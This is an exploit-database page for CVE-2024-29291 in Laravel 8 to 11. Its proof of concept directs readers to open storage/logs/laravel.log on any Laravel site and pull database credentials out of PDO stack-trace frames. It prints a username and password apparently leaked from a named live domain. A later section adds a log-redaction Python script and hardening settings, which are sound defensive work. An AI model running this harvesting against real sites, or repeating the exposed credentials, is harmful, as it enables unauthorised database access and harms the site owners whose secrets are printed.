## https://sploitus.com/exploit?id=PACKETSTORM:178210
# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...
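
For operators auditing their own logs, the following added example (not part of the original advisory or of Laravel) finds the two stack frames shown above in a log and redacts the user and password arguments. The sample log, its paths and its credential values are constructed for the example.

```python
import re

# Argument list of the two frames shown in the trace above:
#   PDO->__construct('dsn', 'user', 'password', ...)
#   Connector->createPdoConnection('dsn', 'user', 'password', ...)
# PHP cuts string arguments in a trace to 15 characters by default and
# appends "...", so a password of 15 characters or fewer is logged in full.
FRAME = re.compile(
    r"(PDO->__construct|createPdoConnection)\("
    r"'([^']*)',\s*'([^']*)',\s*'([^']*)'"
)

# Constructed sample in the shape of a laravel.log entry (not real data).
SAMPLE_LOG = r"""[2024-04-19 10:00:00] production.ERROR: SQLSTATE[HY000] [2002] Connection refused
#0 /var/www/app/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=db.e...', 'example_user', 'example-pass', Array)
#1 /var/www/app/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=db.e...', 'example_user', 'example-pass', Array)
#2 /var/www/app/artisan(35): main()
"""


def find_leaks(log_text):
    """Return (line_number, call, password_truncated) per leaking frame."""
    hits = []
    for m in FRAME.finditer(log_text):
        line_no = log_text.count("\n", 0, m.start()) + 1
        # A value ending in "..." was cut by PHP and is only a prefix.
        hits.append((line_no, m.group(1), m.group(4).endswith("...")))
    return hits


def redact(log_text):
    """Blank the user and password arguments; keep the DSN and the frame."""
    def _mask(m):
        return f"{m.group(1)}('{m.group(2)}', '[REDACTED]', '[REDACTED]'"
    return FRAME.sub(_mask, log_text)


if __name__ == "__main__":
    for line_no, call, truncated in find_leaks(SAMPLE_LOG):
        state = "prefix only" if truncated else "full value"
        print(f"line {line_no}: {call} logs credentials ({state})")
    print(redact(SAMPLE_LOG))
```

Setting `zend.exception_ignore_args = On` in php.ini makes PHP omit arguments from traces, so these frames no longer carry the credentials. The paths in the trace above place `vendor/` under `public_html`, which suggests the application root rather than Laravel's `public/` directory is what the web server exposes; pointing the document root at `public/` keeps `storage/logs` off the web.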